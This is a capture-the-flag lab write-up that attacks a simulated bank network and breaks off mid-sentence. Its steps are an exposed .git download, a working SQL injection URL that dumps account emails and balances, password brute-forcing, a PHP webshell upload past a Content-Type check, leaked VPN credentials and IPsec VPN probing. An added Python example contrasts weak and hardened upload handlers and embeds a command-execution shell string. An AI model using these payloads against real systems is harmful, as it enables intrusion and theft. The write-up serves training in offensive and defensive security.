
Test Lab V.8


First, port-scan the target and note which ports are open.



Then run a directory scanner against the HTTP and HTTPS sites separately; the scans give the following results.



The HTTP site leaks its .git directory. With rip-git, a tool available online, the source can be pulled down; in it you can find the username and password for the HTTP site's admin panel, and after logging in you can find the SITE token.

CABINET

CABINET corresponds to the HTTPS site. From the earlier scan results it exposes an API:

You can use only '/api/auth' or '/api/balance' requests

Feed the auth endpoint some arbitrary input: https://192.168.101.6/api/auth/?email=aaa@bank.com&password=passw0d

Result: {"error":{"email":["The selected email is invalid."]}}

What if a single quote is added? That returns ACCESS DENIED. Try balance instead:

https://192.168.101.6/api/balance/?api_session_token=1&id=-1
returns {"error":{"api_session_token":["The api session token must be 40 characters."]}}

Next, test with a token of exactly 40 characters: https://192.168.101.6/api/balance/?api_session_token=1111111111111111111111111111111111111111&id=-1

The response is now empty, so try injection, keeping the whole token at exactly 40 characters so it still passes the length rule: 30 ones followed by the 10-character tail 'OR '1'='1, whose last literal is left open so that the application's own closing quote completes it. https://192.168.101.6/api/balance?api_session_token=111111111111111111111111111111'OR '1'='1&id=-1

One catch: if the injection is sent to /api/balance/?api_session_token=xxx (with a trailing slash after balance), the result is ACCESS DENIED. The URL above has no trailing slash, and that form goes through.

The final result:

[{"id":"1","email":"KyleEShannon@cuvox.de","balance":"37.00"},{"id":"2","email":"EricLWhitaker@dayrep.com","balance":"59.00"},{"id":"3","email":"PhillipSPhillips@fleckens.hu","balance":"8.00"},{"id":"4","email":"DrewLHolloway@rhyta.com","balance":"111.00"},{"id":"5","email":"ErnestCWilliams@cuvox.de","balance":"154.00"},{"id":"6","email":"RobertPNetherton@cuvox.de","balance":"81.00"},{"id":"7","email":"IsmaelNNewcomb@dayrep.com","balance":"92.00"},{"id":"8","email":"AldenTPfaff@teleworm.us","balance":"78.00"},{"id":"9","email":"JamesMPang@fleckens.hu","balance":"42.00"},{"id":"10","email":"WilliamLSchmidt@armyspy.com","balance":"137.00"},{"id":"11","email":"JohnCPerkins@teleworm.us","balance":"126.00"},{"id":"12","email":"DonaldDRandolph@fleckens.hu","balance":"186.00"},{"id":"13","email":"JohnMMartin@rhyta.com","balance":"186.00"},{"id":"14","email":"MichaelJDavis@fleckens.hu","balance":"73.00"},{"id":"15","email":"TravisMHeadrick@cuvox.de","balance":"179.00"},{"id":"16","email":"JonathanJAlejandro@rhyta.com","balance":"67.00"},{"id":"17","email":"JeremiahBMagee@superrito.com","balance":"73.00"},{"id":"18","email":"ManuelTBoland@rhyta.com","balance":"35.00"},{"id":"19","email":"EthelCMyers@einrot.com","balance":"165.00"},{"id":"20","email":"RandyRDarden@superrito.comThomasMReid@rhyta.com","balance":"20.00"},{"id":"21","email":"JohnIHampton@teleworm.us","balance":"105.00"},{"id":"22","email":"LesterLLenard@cuvox.de","balance":"19.00"},{"id":"23","email":"RalphWestfall@sas-bank.lab","balance":"18.00"}]

From the returned email addresses, RalphWestfall@sas-bank.lab stands out because sas-bank.lab matches the lab's domain. Combined with the auth API from earlier this allows a brute-force attack; the password list is https://github.com/danielmiessler/SecLists/blob/master/Passwords/10_million_password_list_top_10000.txt, and Burp Suite is used to run it. With the password recovered, log in.



The admin panel has an image-upload feature. Uploading a PHP file gives the message that only JPEG and BMP images may be uploaded, yet the uploaded webshell can still be found in the uploads directory; alternatively the Content-Type can be changed to get past the check. Looking around through the webshell turns up token.txt.
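Both observations above, a rejected file that is nevertheless present in uploads and a check that trusts the client's Content-Type, come from the same two mistakes: writing before validating, and validating something the attacker controls. The following added example (not the lab's code) contrasts an assumed handler of that shape with a hardened one that validates first, ignores Content-Type, sniffs magic bytes and picks its own filename. The in-memory `store` dict stands in for the uploads directory.

```python
import uuid

ALLOWED_TYPES = {"image/jpeg", "image/bmp"}
ALLOWED_EXT = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "bmp": "image/bmp"}
REJECT_MSG = "Only JPEG and BMP images may be uploaded."

# Constructed payloads for the demo.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
POLYGLOT = b"\xff\xd8\xff\xe0" + PHP_SHELL   # JPEG magic bytes followed by PHP code


def sniff(data):
    """Return the image type implied by the first bytes, or None."""
    if data[:3] == b"\xff\xd8\xff":
        return "image/jpeg"
    if data[:2] == b"BM":
        return "image/bmp"
    return None


def upload_weak(store, filename, content_type, data):
    """Assumed shape of the lab's handler: the file is written under its original
    name first, then the client-supplied Content-Type is checked. A rejected
    upload still leaves shell.php on disk, and a forged Content-Type is accepted."""
    store["uploads/" + filename] = data
    if content_type not in ALLOWED_TYPES:
        return {"error": REJECT_MSG}
    return {"ok": "uploads/" + filename}


def upload_hardened(store, filename, content_type, data):
    """Validate before writing. content_type is ignored because the client sets it;
    the extension must be on the allowlist, the magic bytes must agree with it,
    and the stored name is server-chosen so the original name never reaches disk."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return {"error": REJECT_MSG}
    sniffed = sniff(data)
    if sniffed is None or sniffed != ALLOWED_EXT[ext]:
        return {"error": REJECT_MSG}
    new_name = "uploads/%s.%s" % (uuid.uuid4().hex, "jpg" if sniffed == "image/jpeg" else "bmp")
    store[new_name] = data
    return {"ok": new_name}


def leftover_scripts(store):
    """Paths in the store that a PHP-enabled directory would execute."""
    return sorted(p for p in store if p.lower().endswith(".php"))


if __name__ == "__main__":
    weak = {}
    print(upload_weak(weak, "shell.php", "application/x-php", PHP_SHELL))  # rejected...
    print(leftover_scripts(weak))                                          # ...but present
    print(upload_weak(weak, "shell2.php", "image/jpeg", PHP_SHELL))        # forged type accepted
    hard = {}
    print(upload_hardened(hard, "shell.php", "image/jpeg", PHP_SHELL))     # rejected, not written
    print(upload_hardened(hard, "shell.jpg", "image/jpeg", POLYGLOT))      # accepted as .jpg
    print(leftover_scripts(hard))
```

Note the last case: a JPEG/PHP polyglot still passes the magic-byte check when it carries a .jpg extension. The hardened handler limits the damage by forcing its own extension and name, but the directory itself must also be served without script execution; magic bytes alone are not a defence against polyglots.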

CISCO

Now the SSH-DEV token is needed, but there is no information about SSH-DEV yet, so start from 192.168.101.7.

The first step, as before, is to scan the target IP:

Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-12 13:48 CST
Nmap scan report for 192.168.101.7
Host is up (0.77s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
8100/tcp open http CommuniGate Pro httpd 6.0.9
| http-methods: Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: CommuniGate Pro sas-bank.lab Entrance
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP P2000 G3 NAS device (94%), linux 2.6.32 - 3.9 (92%), Linux 3.0 - 3.9 (92%), Linux 3.6 (90%), Crestron XPanel control system (90%), Netgear DG834G WAP or Western Digital WD TV media player (90%), Linux 2.6.32 - 2.6.39 (89%), Linux 2.6.38 (89%), Linux 3.2 (89%), Linux 3.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 773.70 ms 10.10.0.1
2 773.75 ms 172-0-0-1.lightspeed.brhmal.sbcglobal.net (172.0.0.1)
3 773.78 ms 192.168.101.7
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.57 seconds

Port 8100 hosts a mail system (CommuniGate Pro); try logging in with the mailbox password obtained earlier.

Inside there is an email about a VPN PASSWORD:

Hi!
We are doing a scheduled replacement of vpn passwords.
login: westfall
password: AiWa8ahk
All other parameters remain unchanged.
Have a nice day!

Judging from the network topology diagram, this should be a Cisco VPN. Connecting to a Cisco IPsec VPN requires, besides a username and password, a group name and a group secret. For example, in vpnc's configuration format:

IPSec gateway vpn17.example.com
IPSec ID groupa
IPSec secret groupapassword
Xauth username charlie
Xauth password passw0rd

What remains is to guess the IPSec ID and the IPSec secret. ike-scan can be used first to gather information (see its user manual). PS: when I first did this I simply guessed the ID and secret; only after reading the writeup did I learn about ikeforce ;)

~csw ike-scan -A -M --id=bar 192.168.101.7
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.101.7 Aggressive Mode Handshake returned
HDR=(CKY-R=f59caea8c98e8852)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=172.16.0.100)
Hash(20 bytes)
VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)
Ending ike-scan 1.9: 1 hosts scanned in 0.550 seconds (1.82 hosts/sec). 1 returned handshake; 0 returned notify
Using ikefor
